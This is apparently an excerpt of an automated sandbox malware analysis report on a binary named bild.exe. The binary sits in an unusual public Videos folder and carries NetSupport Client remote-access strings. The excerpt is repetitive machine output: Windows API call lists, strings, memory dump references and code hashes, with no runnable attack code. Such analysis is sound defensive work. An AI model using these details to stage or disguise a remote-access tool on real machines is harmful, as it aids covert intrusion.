                                                                                      • GetTickCount.KERNEL32 ref: 11017423
                                                                                      Strings
                                                                                      • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101742D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                       • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                       • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                                      • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                      • API String ID: 3804766296-4122679463
                                                                                      • Opcode ID: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                      • Instruction ID: c54e938b4ab1921e6220328725fe5e45cb955b1045b44cf9de438437e8313787
                                                                                      • Opcode Fuzzy Hash: 66f2a400a49d4a3db1117531ae3dbc6183e4453ddcab9e324682772d92ed33ab
                                                                                      • Instruction Fuzzy Hash: 47F0A0B6E1011C6BE700DBF9AC8AE6BBB9CDB4471CB100026F910C7245E9A6BC1087A1
                                                                                      APIs
                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                      • CreateThread.KERNEL32(00000000,00001000,Function_00137630,00000000,00000000,11138782), ref: 1113782E
                                                                                      • CloseHandle.KERNEL32(00000000,?,11138782,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11137835
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleThread__wcstoi64
                                                                                      • String ID: *AutoICFConfig$Client
                                                                                      • API String ID: 3257255551-59951473
                                                                                      • Opcode ID: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                      • Instruction ID: 9aee7181833ba8711af7cecc10eced9f2f0784297ad8accf53734ae3fbf9e9e1
                                                                                      • Opcode Fuzzy Hash: 58a92f72c8c5fc2ca777e547e4c7fef86ef2c1d8c64fc3a44eb11c2425719861
                                                                                      • Instruction Fuzzy Hash: 98E0D8757A062D7AF6149AE98C86F65F6199744B26F500154FA20A50C4D6A0A440CB64
                                                                                      APIs
                                                                                      • Sleep.KERNEL32(000000FA), ref: 11070CB7
                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 11070CC4
                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 11070D96
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeaveSleep
                                                                                      • String ID: Push
                                                                                      • API String ID: 1566154052-4278761818
                                                                                      • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                      • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                      • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                      • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                      APIs
                                                                                      • GetCommandLineA.KERNEL32 ref: 00821027
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 0082107B
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00821096
                                                                                      • ExitProcess.KERNEL32 ref: 008210A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3580718425.0000000000821000.00000020.00000001.01000000.00000009.sdmp, Offset: 00820000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3580699277.0000000000820000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_820000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                      • String ID:
                                                                                      • API String ID: 2164999147-0
                                                                                      • Opcode ID: c991ff5fe9495dac9077eac087fcc46d835ac97b2e3568effc64c1c7ab0a7172
                                                                                      • Instruction ID: 0fb08f1a121fe326dc4a69f0c291b27bafe659ddb1223e100090448ec86538e8
                                                                                      • Opcode Fuzzy Hash: c991ff5fe9495dac9077eac087fcc46d835ac97b2e3568effc64c1c7ab0a7172
                                                                                      • Instruction Fuzzy Hash: 7611A120404BE46AEF315F64A88CBEABFA5FB22780F340044E8D6D6146D25648C7C7A5
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1314093303-0
                                                                                      • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                      • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess
                                                                                      • String ID: C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                      • API String ID: 2251294070-1016564174
                                                                                      • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                      • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • _memset.LIBCMT ref: 1110F4D2
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp
                                                                                      • API String ID: 2803934178-2363596943
                                                                                      • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                      • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle
                                                                                      • String ID: \\.\NSWFPDrv
                                                                                      • API String ID: 3498533004-85019792
                                                                                      • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                      • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                      APIs
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _calloc
                                                                                      • String ID:
                                                                                      • API String ID: 1679841372-0
                                                                                      • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                      • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                      • __wsplitpath.LIBCMT ref: 11111475
                                                                                        • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                      • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                      • String ID:
                                                                                      • API String ID: 1847508633-0
                                                                                      • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                      • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                      • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                      • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                        • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                        • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00F5DEA0,?,00000001,00000001), ref: 1109E9A3
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2256153495-0
                                                                                      • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                      • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                      • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                      • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: ??CTL32.DLL
                                                                                      • API String ID: 1029625771-2984404022
                                                                                      • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                      • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                      • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                      • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                      APIs
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                      Strings
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: ?:\
                                                                                      • API String ID: 338552980-2533537817
                                                                                      • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                      • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                      • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                      • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                      APIs
                                                                                        • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                      • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseOpenwvsprintf
                                                                                      • String ID: Error %d Opening regkey %s
                                                                                      • API String ID: 1772833024-3994271378
                                                                                      • Opcode ID: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                      • Instruction ID: 33cf1931661e2960d377c619dd89904b97ea319b13ae6f8f8dcb9591a9c6775e
                                                                                      • Opcode Fuzzy Hash: 503dc904c3fe8a3076b33c474287afaa84f0668cd560d7128fb7a99791884548
                                                                                      • Instruction Fuzzy Hash: 60E0927A6012187FD210961B9C89F9BBB2DDB856A4F000069FD1487201C972EC1082B0
                                                                                      APIs
                                                                                      • RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d closing regkey %x, xrefs: 110ED17D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Closewvsprintf
                                                                                      • String ID: Error %d closing regkey %x
                                                                                      • API String ID: 843752472-892920262
                                                                                      • Opcode ID: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                      • Instruction ID: 72b2cf3cdd4b8fd577e25b07e2838f9a8e734d144b1f96517ba84771a8eadcbb
                                                                                      • Opcode Fuzzy Hash: c03f117d653720bd7e371fb7cf4e9287afa325923508867b0082396cad6e8e67
                                                                                      • Instruction Fuzzy Hash: 4EE08679A022126BD3289A1EAC18F5BB6E8DFC4300F1604ADF850C3240DA70D8018664
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(NSMTRACE,?,1102DE54,11026580,00EEB898,?,?,?,00000100,?,?,00000009), ref: 111463E9
                                                                                        • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
